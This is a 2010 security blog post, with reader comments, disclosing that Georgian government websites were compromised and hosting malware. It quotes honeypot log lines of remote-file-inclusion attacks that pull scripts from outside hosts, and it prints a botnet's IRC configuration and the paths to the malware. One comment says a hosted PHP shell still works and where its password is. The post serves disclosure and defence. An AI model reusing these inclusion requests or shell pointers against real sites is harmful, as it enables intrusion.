*UPDATE: A few hours after this post, they removed the malware from justice.gov.ge and other sites. I am glad we had some effect.
You know, you would think that after all the attacks that Georgia suffered in 2008 they would be more careful about the security of their sites.
Well, not really. Even after I sent a bunch of emails to all their addresses that I could find and requested on twitter for contacts in the .ge government, nobody replied and they are still hacked, spreading malware and attacking other systems.
It doesn’t look like it is being caused by the Russians or anything like that. And the attackers this time didn’t defaced their web page. They just added some malware and scripts to attack others.
How do I know? We run multiple honeypots to detect web-based attacks and malware. And guess who started attacking us?
Analysis
I started seeing the first attacks on January 12th, trying to load RFI (remote files) from psg.gov.ge:
a.b.147.154 – – [12/Jan/2010:14:05:43 -0200] “GET ///?_SERVER[DOCUMENT_ROOT]=https://www.psg.gov.ge//album/respon1.txt? HTTP/1.1″ 200 6312 “-” “Mozilla/5.0”
a.b..147.154 – – [12/Jan/2010:14:05:46 -0200] “GET /xxx//?_SERVER[DOCUMENT_ROOT]=https://www.psg.gov.ge//album/respon1.txt? HTTP/1.1″ 200 7281 “-” “Mozilla/5.0”
A few days later I started seeing more attacks using malware hosted from www.justice.gov.ge
a.b.63.102 – – [14/Jan/2010:03:04:23 -0200] “GET /xxx*.php?page=https://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1″ 200 36 “-” “Mozilla/5.0”
That’s when I decided to look deeper at the issue. The respon1.txt is a common file used on RFI attacks:
$ lynx –dump –source https://www.justice.gov.ge//album/respon1.txt
< ?php /* Fx29ID */ echo(“FeeL”.”CoMz”); echo(“FeeL”.”CoMz”); /* Fx29ID */ ?>
Then I went to look at this “album” directory and that really shocked me. When you visit https://www.justice.gov.ge/album/ you can see a full collection of malware:
From the https://www.justice.gov.ge/album/bot.txt showing credentials to control a botnet, to flooding tools, remote shells, they got everything.
servban=array(“irc.allnetwork.org”,””,””);
$bot[‘admin’]=”E_motz”;
$bot[‘pass’]=”gila”;
$bot[‘inick’]=”identnick”;
$bot[‘pnick’]=”passwordnick”;
$bot[‘basechan’]=”#vanjava”;
A look at the top of the simbah.txt shows a “funny” message: https://www.justice.gov.ge/album/simbah.txt
# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
# % private hackers pwned your box %
# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
Even a remote proxy is there at https://www.justice.gov.ge/album/proxy.tgz
Attacking others
If that was not bad enough, by the end of January I started to see their own IP addresses attacking others:
87.253.63.102 – – [01/Feb/2010:04:41:09 -0200] “GET //include/write.php?dir=https://www.gk-rus.ru/images/laknat/.id?? HTTP/1.1” 200 36 “-” “libwww-perl/5.805”
87.253.63.102 – – [01/Feb/2010:04:41:09 -0200] “GET /xxx/include/write.php?dir=https://www.gk-rus.ru/images/laknat/.id?? HTTP/1.1” 200 36 “-” “libwww-perl/5.805”
81.95.173.72 – – [23/Jan/2010:16:07:29 -0200] “GET /xxx/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS;=&mosConfig;_absolute_path=https://krupuk.110mb.com/res1.txt?%20? HTTP/1.1” 200 36 “-” “Mozilla/5.0”
So, at the end, we have some sites from the Georgia government hosting malware and these 4 attacking others:
www.psg.gov.ge – 87.253.63.102 (redirects now to justice.gov.ge)
www.justice.gov.ge – 87.253.63.102
moh.gov.ge – 81.95.173.72
mail.justice.gov.ge – 87.253.63.100
If you have any contact at the Georgie government, let them know about this post. I have been trying to speak with someone since January without success. Maybe with some extra exposure they will notice and fix it.
6 comments
lol the batik.php still works. The password for the PHP Shell is inside the batik.txt. Dont know wich Provider they use, but it looks like that they need a big kick in their a.. or the Securityfolks of georgia.gov. Unbelievable.
Thanks to joomla plugins, delitosinformaticos.gov.co, a colombia gov website, hosts some malwares too. 🙂
http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id2.txt
clem1: yes, I already contacted them about it. In fact, there is quite a few colombia .gov sites hosting it too..
I know websites are not perfect as I've been working on such governmental projects in Georgia, but most of problems come from website "administrators". They don't know how to keep their PCs secure.
Chekura: Yes, nothing is perfect… But the way it is right now can easily be improved by just a little extra security precautions.
There are many attacks nowdays. Be aware of malware. Hope that You can protect your site in the future.
Tjäna Pengar
Comments are closed.